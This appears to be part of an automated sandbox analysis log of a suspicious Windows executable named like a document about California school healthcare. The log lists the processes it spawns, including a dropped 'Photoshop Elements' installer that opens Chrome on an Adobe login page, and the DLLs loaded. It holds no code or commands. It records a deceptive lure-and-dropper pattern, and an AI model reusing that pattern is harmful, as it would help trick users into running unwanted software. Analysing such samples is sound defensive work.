| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://ims-na1.adobelogin.com/ims/authorize?client_id=CC_HD_ESD_WEB&scope=allow_ac_dt_exchange%2Copenid%2CAdobeID%2Ccreative_cloud%2Ccreative_sdk%2Cread_organizations%2Csao.cce_private%2Cadditional_info.account_type&locale=en_US&redirect_uri=https%3A%2F%2Fauth.services.adobe.com%2Fen_US%2Fdeeplink.html%3Fdelegated_request_id%3D8b59eed4-a4c2-4d7f-a8ea-ab95b58f0a24%26client_id%3DCC_HD_ESD_WEB%26deeplink%3Ddelegation | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2156 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4124 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5524 --field-trial-handle=1916,i,13664864779448031188,2924605641930340072,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown | |
| Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe | Section loaded: version.dll | Jump to behavior |
| Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe | Section loaded: netapi32.dll | Jump to behavior |
| Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe | Section loaded: netutils.dll | Jump to behavior |
| Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe | Section loaded: uxtheme.dll | Jump to behavior |
| Source: C:\Users\user\Desktop\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.exe | Section loaded: apphelp.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: mpr.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: version.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: netapi32.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: winhttp.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: netutils.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: uxtheme.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: kernel.appcore.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: wtsapi32.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: winsta.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: textinputframework.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: coreuicomponents.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: coremessaging.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: ntmarta.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: coremessaging.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: wintypes.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: wintypes.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: wintypes.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: windows.storage.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: wldp.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: profapi.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: shfolder.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: rstrtmgr.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: ncrypt.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: ntasn1.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: textshaping.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: dwmapi.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: propsys.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: edputil.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: urlmon.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: iertutil.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: srvcli.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: windows.staterepositoryps.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: sspicli.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: appresolver.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: bcp47langs.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: slc.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: userenv.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: sppc.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: onecorecommonproxystub.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: onecoreuapcommonproxystub.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmp | Section loaded: apphelp.dll | Jump to behavior |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: kernel.appcore.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: uxtheme.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: windows.storage.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: wldp.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: msxml3.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: msasn1.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: cryptsp.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: rsaenh.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: cryptbase.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: gpapi.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: profapi.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: secur32.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: sspicli.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: wbemcomn.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: amsi.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: userenv.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: version.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: explorerframe.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ntmarta.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: textinputframework.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: coreuicomponents.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: coremessaging.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: wintypes.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: wintypes.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: wintypes.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: atlthunk.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ieframe.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: iertutil.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: netapi32.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: winhttp.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: wkscli.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: netutils.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: dataexchange.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: d3d11.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: dcomp.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: dxgi.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: twinapi.appcore.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: urlmon.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: srvcli.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: propsys.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: msiso.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: sxs.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: mshtml.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: powrprof.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: umpdc.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: srpapi.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: jscript9.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: msimtf.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: resourcepolicyclient.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: d2d1.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: dwrite.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: d3d10warp.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: dxcore.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: windowscodecs.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: mlang.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: wininet.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: wtsapi32.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: winsta.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: edputil.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: iphlpapi.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: dhcpcsvc6.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: windows.staterepositoryps.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: appresolver.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: bcp47langs.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: slc.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: sppc.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: dhcpcsvc.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: onecorecommonproxystub.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: onecoreuapcommonproxystub.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: webio.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: mswsock.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: winnsi.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: dnsapi.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: rasadhlp.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: fwpuclnt.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: schannel.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: apphelp.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: mskeyprotect.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ntasn1.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ncrypt.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ncryptsslp.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: dpapi.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: windows.shell.servicehostbuilder.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: policymanager.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: msvcp110_win.dll | |
| Source: C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll | |
| Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll | |
